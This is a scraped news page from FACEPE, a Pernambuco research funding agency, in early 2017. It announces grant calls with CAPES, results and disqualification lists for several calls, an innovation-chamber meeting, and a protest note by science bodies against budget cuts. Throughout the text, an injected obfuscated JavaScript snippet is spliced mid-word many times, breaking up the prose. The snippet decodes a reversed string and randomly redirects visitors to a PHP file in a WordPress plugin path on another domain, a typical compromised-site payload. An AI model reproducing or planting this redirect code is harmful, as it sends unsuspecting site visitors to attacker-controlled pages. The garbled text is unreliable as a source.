FACEPE lança edital em parceria com a CAPES para Estímulo à Cooperação Internacional dos PPGs de Pernambuco

Capes InternacionalEm concordância com o Acordo CAPES-FACEPE 2016-2022, a FACEPE lança o edital 01/2017 (Estímulo à Cooperação Internacional dos PPGs de Pernambuco). Esse é o primeiro de 3 editais que serão lançados ao longo da vigência do Acordo, cada um com oferta de R$ 1,1 milhões. O objetivo deste Edital é estimular as atividades de cooperação acadêmica internacional dos programas de pós-graduação (PPGs) de Pernambuco, por meio da concessão de recursos adicionais de custeio da CAPES para os programas com notas CAPES 4, 5 e 6, que se destaquem por empreender atividades de cooperação científica com instituições conceituadas no exterior, por meio de projetos conjuntos de pesquisa entre as equipes pernambucana e estrangeira para consolidação, expansão e internacionalização dos programas de pós-graduação através do apoio ao intercâmbio.

Serão aceitas até 2 propostas por PPG, no valor de até R$ 25 mil por proposta, submetida pelo respectivo coordenador do PPG. O prazo para submissão se encerra em 24/03/2017.

Baixe aqui o edital.

Divulgado o resultado da 3ª Rodada do Edital FACEPE 01/2016 DCR

DCRSaiu o resultado da Etapa IV da 3ª rodada do Edital FACEPE 01/2016 do Programa de Desenvolvimento Científico Regional – DCR. Ao todo 7 (sete) propostas foram recomendadas e serão indicadas na Plataforma de Indicação Carlos Chagas (PICC) do CNPq, fic$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando 12 (doze) em lista de espera aguard$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando vacância.

Para que a bolsa seja implantada e o projeto possa iniciar é necessário aguardar a análise e homologação pelo CNPq, que pode demorar mais algumas semanas.

Acesse o resultado.

 

Divulgada a relação dos processos desenquadrados do Edital FACEPE 18/2016 PNPD

A relação dos processos desenquadrados pela área técnica da FACEPE já se encontra disponível neste site. Os coordenadores responsáveis por esses projetos estão recebendo a mensagem eletrônica com o motivo do desenquadramento hoje, dia 09/01/2017.

O prazo para interposição de recurso vai até o próximo dia 19. A orientação de procedimento pode ser encontrada em http://www.facepe.br/editais/recursos/

Acesse aqui a relação dos processos desenquadrados.

Edital FACEPE 17/2016 PBPG 2017.1 – Divulgado os processos que foram desenquadrados pela equipe técnica

Na sexta-feira, dia 06 de janeiro, foram expedidas as mensagens aos orientadores e coordenadores de processos submetidos ao Edital FACEPE 17/2016 PBPG 2017.1 que foram desenquadrados pela equipe técnica.

O prazo para interposição de recurso vai até o próximo dia 16. A orientação de procedimento pode ser encontrada em http://www.facepe.br/editais/recursos/

Acesse aqui a relação dos processos desenquadrados.

FACEPE divulga o resultado final do edital 11/2016 – PEPE Inova Talentos

FACEPE divulga o resultado final do edital 11/2016 – PEPE Inova TalentosEste Edital tem o objetivo de colocar mestres e/ou doutores em empresas privadas localizadas no Estado de Pernambuco através de desenvolvimento de pesquisa.

Foram aprovadas 06 (seis) propostas para apoio financeiro no edital 11/2016 PEPE Inova Talentos do Programa Pesquisadores na Empresa de Pernambuco (PEPE) no valor total de R$ 408.000,00 (quatrocentos e oito mil reais).

Para a fase de contratação das propostas aprovadas, deverá ser apresentado à FACEPE o Termo de Adesão entre a empresa executora e o IEL PE.

Baixe aqui o resultado final.

1ª Reunião de 2017 da Câmara de Inovação

IMG_9119Primeira Reunião da Câmara de Inovação da FACEPE em 2017, que contou com a presença dos membros (da esquerda para a direita): José Lamartine Távora Junior, Guilherme Calheiros, Fátima Cabral, Alex$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andre Stamford da Silva, Valencio Guedes Pereira,  Gilca Sobral, Neildes Vieira Paiva, Cláudio Abreu,  Walter Franklin M. Correia, Cesar Andrade, Am$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Guerra, José Geraldo Eugênio.

NOTA DE PROTESTO

imagesAs entidades abaixo relacionadas, que representam comunidades acadêmicas, científicas, tecnológicas e de inovação, vêm a público denunciar a operação desastrosa feita pelo Congresso Nacional na Lei Orçamentária Anual – LOA 2017 com a criação de uma nova fonte de recursos (fonte 900) retir$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando verbas das áreas de educação e C,T&I. Esses recursos estavam antes assegurados pela fonte 100, que tem pagamento garantido pelo Tesouro Nacional.

Essa transferência para a fonte 900 não tem recursos assegurados, tanto que passam a ser chamados de “recursos condicionados “ de acordo com manual orçamentário. A fonte 900 inclusive põe em dúvida o cumprimento da Lei de Responsabilidade Fiscal – LRF, que exige para cada empenho a definição clara da fonte de recursos. Qual a fonte real que o governo utilizará para honrar os pagamentos prometidos pela LOA 2017 à área de C,T&I se a fonte usada está “condicionada” a um apontamento futuro?

Salientamos que só na área de C,T&I o impacto financeiro será de R$ 1,712 bilhão, deix$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando a operação das OSs e das bolsas de pesquisa com apenas R$ 206 milhões na fonte 100, de pagamento direto pelo Tesouro Nacional. Em todo o Ministério da Ciência, Tecnologia, Inovação e Comunicação – MCTIC, somente a pesquisa científica foi atingida pela transferência de recursos para a fonte 900.

A operação realizada pelos parlamentares gerará, na prática, um corte de 89,24% nas dotações orçamentárias previstas para administração do setor, as Organizações Sociais (OSs) e as bolsas de formação e capacitação em C,T&I. Isso porque a nova fonte 900 poderá ser uma mera ficção, ao tirar a garantia de pagamento dos recursos previstos na LOA para coloca-los na dependência futura de uma nova lei que, de fato, defina uma fonte segura que cubra a previsão orçamentária.

Para educação e C,T&I a situação é gravíssima tendo em vista a aprovação, por este mesmo Congresso Nacional, da PEC dos Gastos Públicos, que congelará os investimentos em educação para os próximos 20 anos. É triste ver o país continuam encar$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando educação e C,&I como gasto e não como investimento, como ocorre em países avançados, por falta absoluta de compreensão dos que decidem.

Apesar do que afirma o governo, a transferência de recursos da pesquisa para a fonte 900 gerará impactos dramáticos no sistema educacional já em 2017, caso não seja imediatamente revertida, prejudic$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando milhares de pesquisadores em todo o pais que dependem de bolsas da CAPES e do CNPq para dar sequencia a seus trabalhos.

Oficialmente, alegam que os recursos suspensos serão pagos por meio da Desvinculação de Receitas da União – DRU. Fosse isso verdade, porque então não manter as verbas na fonte 100, já que será o mesmo Tesouro Nacional quem irá administrar as verbas desvinculadas futuramente?

No jogo político, o sequestro das verbas aprovado pelo Congresso Nacional nos parece uma forma não ortodoxa para garantir a aprovação da controversa Lei de Repatriação de Recursos (PL 2.617/2015), de onde supostamente viria a verba capaz de voltar a garantir o pagamento efetivo dos recursos colocados na fonte 900.

É lamentável constatar esses fatos que serão extremamente prejudiciais ao país. Qualquer Nação na era da economia do conhecimento sabe que educação e C,T&I são as peças fundamentais para atingir os objetivos de cidadania num mundo global.

A comunidade acadêmica, científica, tecnológica e de inovação está perplexa com a sequencia de ações tomadas pelo governo federal em parceria com o Congresso Nacional, que claramente colocam em risco o futuro do Brasil. Sinceramente esperamos que essas decisões sejam revistas pelo bem da Nação e do povo brasileiro.

Academia Brasileira de Ciências (ABC)

Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores (Anprotec)

Associação Nacional de Pesquisa e Desenvolvimento de Empresas Inovadoras (Anpei)

Conselho Nacional das Fundações Estaduais de Amparo à Pesquisa (Confap)

Conselho Nacional de Secretários Estaduais para Assuntos de Ciência, Tecnologia e Inovação (Consecti)

Sociedade Brasileira para o Progresso da Ciência (SBPC)

 

FACEPE lança editais em parceria com a CAPES para Titulação Docente em Pernambuco

Em concordância com o Acordo CAPES-FACEPE 2016-2022, foram lançados hoje 2 editais referentes à titulação docente na IES públicas de Pernambuco. O edital 21/2016 (DINTER) apoia o funcionamento de uma turma especial de Doutorado, oferecida por um Programa de Pós-Graduação com elevado conceito na CAPES, em uma IES pública. Analogamente, o edital 22/2016 (Capacitação docente) permite às IES públicas, da esfera estadual e municipal, obterem apoio financeiro da FACEPE (a esfera federal já recebe apoio financeiro da CAPES) para obtenção do título de doutorado aos seus docentes em instituições em todo o país. As submissões à FACEPE só podem ocorrer após a aprovação das propostas em editais específicos da CAPES. Seguem abaixo os objetos de cada edital. DINTER (21/2016): Apoiar a execução de projetos Doutorado Interinstitucional (DINTER), previamente aprovados pela CAPES, que beneficiem instituições de ensino superior sediadas em Pernambuco, viabiliz$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando a formação de doutores fora dos gr$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andes centros de ensino e pesquisa do estado, principalmente no interior, a fim de promover a capacitação de docentes para os diferentes níveis de ensino, subsidiar a nucleação e o fortalecimento de novos grupos de ensino e pesquisa, e fortalecer e estabelecer as condições para a criação de novos cursos de pós-graduação stricto sensu no estado. Baixe aqui o edital. Baixe aqui a planilha “Resumo do orçamento – DINTER“. Capacitação docente (22/2016): Financiar projetos de capacitação docente apresentados por Instituições de Ensino Superior públicas da esfera estadual e municipal (em particular as autarquias municipais de ensino superior) sediadas em Pernambuco que tenham obtido parecer favorável na avaliação realizada pela CAPES no âmbito da Capacitação Docente, vis$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando propiciar a continuidade na formação de jovens doutores, a consolidação de grupos de pesquisa, a integração interinstitucional e a mobilidade acadêmica, nacionalmente. Os projetos das IES estaduais e municipais de Pernambuco serão recebidos, nos moldes do Plano de Formação Docente (Planfor), e terão seu mérito julgado pela CAPES para estarem aptos a solicitarem auxílio financeiro à FACEPE. Baixe aqui o edital. Baixe aqui a planilha “Resumo do orçamento – Capacitação Docente“.